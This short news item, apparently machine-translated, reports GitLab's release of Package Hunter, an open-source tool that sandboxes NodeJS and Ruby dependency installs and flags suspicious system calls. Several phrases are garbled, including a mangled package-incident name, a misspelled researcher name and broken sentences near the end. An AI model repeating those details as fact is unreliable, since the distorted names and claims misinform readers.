It released GitLab Package Hunter, a tool that should detect malicious code in dependencies, or third-party libraries that developers add to their code, before it causes any harm. The tool is open source and released for free.
Package Hunter installs dependencies in a sandbox environment and monitors all system calls made by dependencies during installation. If there is a suspicious call between them, the user will receive a notification, so they can take action. Package Hunter currently supports NodeJS and Ruby Gems modules.
GitLab Package Hunter was developed in part because it hopes this will give developers more confidence in using public libraries. Public libraries are easy to reuse and add new functionality, but there is a risk of adding bugs or malicious code to their programs via these dependencies.
Research shows from 2020 Open source packages are regularly misused in supply chain attacks. For example, a malicious code was added last year Broadcast popular package events. Start this year Published by researcher Alex Bersan How he could use dependencies to hack the likes of Apple and Microsoft.
GitLab has been testing Package Hunter since November last year and has now released the tool for free and open source. In this way, GitLab hopes that developers will continue to contribute to the project and report bugs. Package Hunter can handle any project Added with the GitLab CI . model.
